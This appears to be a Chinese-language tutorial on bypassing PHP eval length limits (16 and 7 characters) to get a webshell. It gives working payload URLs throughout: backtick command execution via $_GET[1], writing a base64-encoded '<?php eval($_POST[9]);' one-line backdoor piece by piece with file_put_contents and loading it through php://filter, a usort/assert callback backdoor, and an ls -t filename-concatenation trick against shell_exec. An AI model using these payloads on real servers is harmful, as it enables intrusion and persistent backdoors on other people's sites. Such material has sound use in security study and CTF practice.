文章目录
- EVAL长度限制突破技巧
- 限制16字符
- \`$_GET[1]\`
- file_put_contents
- usort(...$_GET);
- 限制7字符
EVAL长度限制突破技巧
限制16字符
PHP Eval函数参数限制在16个字符的情况下,如何拿到Webshell?
<?php
$param = $_REQUEST['param']; If (
strlen($param) < 17 && stripos($param, 'eval') === false && stripos($param, 'assert') === false
) {
eval($param);
}
上面这段代码的意思是传递的参数要小于17位,并且不能存在eval和assert。
那我们怎么处理呢?
`$_GET[1]`
可以这样写
?param=`$_GET[1]`;&1=id
这样就突破了长度限制,那我们是不是也可以写一些恶意代码?答案是的.
尝试在tmp下创建一个文件
?param=`$_GET[1]`;&1=touch%20/tmp/111.txt
file_put_contents
foo.php?1=file_put_contents¶m=$_GET[1](N,P,8);
foo.php?1=file_put_contents¶m=$_GET[1](N,D,8);
...
foo.php?1=file_put_contents¶m=$_GET[1](N,w,8);
/* 'PD9waHAgZXZhbCgkX1BPU1RbOV0pOw' ✲写入文件'N'中 */
foo.php?param=include$_GET[1];&1=php://filter/read=convert.b ase64-decode/resource=N
语句中的8是什么意思?
查阅资料得知8在php底层中的c语言是追加。
为什么要写base64编码?
因为使用file_put_contents时,有些字符不能使用,例如<.
PD9waHAgZXZhbCgkX1BPU1RbOV0pOw #<?php eval($_POST[9]);
usort(…$_GET);
也就是可变长参数=>usort回调后门=>任意代码执行
usort就是将传入的两个参数,第一个是一个数组,第二个是一个回调函数,然后将数组的值挨个向回调函数里放。
foo.php?1[]=test&1[]=phpinfo();&2=assert
实操
使用浏览器发包
?1[]=test&1[]=phpinfo();&2=assert
然后使用burp抓包,改包的内容为post。
结果
限制7字符
<?php
$param = $_REQUEST['param']; If ( strlen($param) < 8 ) { echo shell_exec($param);
}
>0这样是创建一个文件名为0的文件。
那我们就想能不能通过一些方式,将文件名排列组合拼接在一起形成一句话木马?能利用的也就是按照时间进行排序。
ls -t以创建时间来列出当前目录下的所有文件
文件列表以[换行符]分割每个文件
引入\转义ls时的换行
换行不影响命令执行
成功构造任意命令执行,写入webshell
